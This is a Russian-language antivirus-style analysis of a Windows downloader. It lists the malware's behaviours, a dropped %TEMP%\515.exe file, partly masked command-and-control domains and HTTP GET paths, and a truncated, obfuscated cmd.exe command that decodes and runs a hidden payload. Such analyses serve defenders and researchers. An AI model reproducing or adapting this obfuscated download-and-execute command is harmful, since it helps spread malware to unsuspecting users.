Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V\C"set OTq3=cqLNEZiDOiHpBcPhRuAZStAXZlijNqRtBbDslm;F(kW=yCwo$Q)r657GIvnd.,M 8f':z+\g@x\eT}1aU-{0&&for %6 in (48,80,62,46,43,66,29,8,31,66,38,48,36,29,6...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\515.exe
Удаляет следующие файлы
- %TEMP%\515.exe
Подменяет следующие файлы
- %TEMP%\515.exe
Сетевая активность
Подключается к
- 'it####namirim.org':80
- 'we#####designgarden.com':80
- 'ho##n.net':80
- 'id###periet.com':80
TCP
Запросы HTTP GET
- http://it####namirim.org/fj
- http://we#####designgarden.com/k7Xp
- http://ho##n.net/h6T6
- http://www.ho##n.net/h6T6
- http://www.id###periet.com/0hP
UDP
- DNS ASK is##.com.mx
- DNS ASK it####namirim.org
- DNS ASK we#####designgarden.com
- DNS ASK ho##n.net
- DNS ASK id###periet.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V\C"set OTq3=cqLNEZiDOiHpBcPhRuAZStAXZlijNqRtBbDslm;F(kW=yCwo$Q)r657GIvnd.,M 8f':z+\g@x\eT}1aU-{0&&for %6 in (48,80,62,46,43,66,29,8,31,66,38,48,36,29,6...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V/C"set OTq3=cqLNEZiDOiHpBcPhRuAZStAXZlijNqRtBbDslm;F(kW=yCwo$Q)r657GIvnd.,M 8f':z+/g@x\eT}1aU-{0&&for %6 in (48,80,62,46,43,66,29,8,31,66,38,48,36,29,68,43,58,75,46,81,47,33,27,75,13,31,63,28...
